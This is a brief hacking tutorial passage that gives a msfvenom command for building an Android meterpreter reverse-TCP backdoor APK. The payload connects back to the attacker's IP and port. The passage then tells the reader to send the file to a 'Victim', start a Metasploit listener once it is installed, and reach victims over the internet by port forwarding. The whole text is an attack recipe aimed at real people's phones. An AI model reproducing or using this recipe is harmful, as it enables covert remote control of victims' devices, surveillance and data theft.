Open a terminal, and generate a payload .apk
The command for generating payload for android is :
msfvenom android/meterpreter/reverse_tcp LHOST=192.168.1.4 lport=4444 -i 3 -o thehackerstuff.apk (replace LHOST with your own IP)

Then send the file to Victim, after the victim installs the backdoor apk , then fire up metasploit framework and create a listener
You can also apply this method on WAN i.e. by external ip and port forwarding
